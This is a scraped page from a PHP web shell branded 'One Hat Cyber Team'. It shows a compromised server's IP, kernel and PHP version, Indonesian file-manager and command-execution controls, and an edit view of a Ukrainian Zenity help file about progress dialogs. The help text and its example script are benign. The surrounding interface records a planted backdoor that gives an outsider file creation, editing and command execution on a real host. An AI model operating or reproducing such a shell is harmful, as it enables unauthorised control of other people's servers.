One Hat Cyber Team
Your IP :
216.73.216.50
Server IP :
157.15.65.100
Server :
Linux 157-15-65-100.cprapid.com 5.14.0-362.24.2.el9_3.x86_64 #1 SMP PREEMPT_DYNAMIC Sat Mar 30 14:11:54 EDT 2024 x86_64
Server Software :
Apache
PHP Version :
8.2.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
help
/
uk
/
zenity
/
Edit File:
progress.page
<?xml version="1.0" encoding="utf-8"?> <page xmlns="http://projectmallard.org/1.0/" type="topic" id="progress" xml:lang="uk"> <info> <link type="guide" xref="index#dialogs"/> <desc>Use the <cmd>--progress</cmd> option.</desc> </info> <title>Діалог поступу</title> <p> Use the <cmd>--progress</cmd> option to create a progress dialog. </p> <p> <app>Zenity</app> reads data from standard input line by line. If a line is prefixed with #, the text is updated with the text on that line. If a line contains only a number, the percentage is updated with that number. </p> <p>Діалог поступу підтримує наступні параметри:</p> <terms> <item> <title><cmd>--text</cmd>=<var>text</var></title> <p>Вказує текст, який відображається у діалозі поступу.</p> </item> <item> <title><cmd>--percentage</cmd>=<var>percentage</var></title> <p>Вказує початковий відсоток, який виставляється у діалозі поступу.</p> </item> <item> <title><cmd>--auto-close</cmd></title> <p>Закриває діалог поступу при досяганні 100%</p> </item> <item> <title><cmd>--pulsate</cmd></title> <p>Вказує, що індикатор поступу пульсує доки зі стандартного вводу не буде прочитано символ EOF.</p> </item> </terms> <p> The following example script shows how to create a progress dialog: </p> <code> #!/bin/sh ( echo "10" ; sleep 1 echo "# Updating mail logs" ; sleep 1 echo "20" ; sleep 1 echo "# Resetting cron jobs" ; sleep 1 echo "50" ; sleep 1 echo "This line will just be ignored" ; sleep 1 echo "75" ; sleep 1 echo "# Rebooting system" ; sleep 1 echo "100" ; sleep 1 ) | zenity --progress \ --title="Update System Logs" \ --text="Scanning mail logs..." \ --percentage=0 if [ "$?" = -1 ] ; then zenity --error \ --text="Update canceled." fi </code> <figure> <title>Приклад діалогу поступу</title> <desc><app>Zenity</app> progress dialog example</desc> <media type="image" mime="image/png" src="figures/zenity-progress-screenshot.png"/> </figure> </page>
Simpan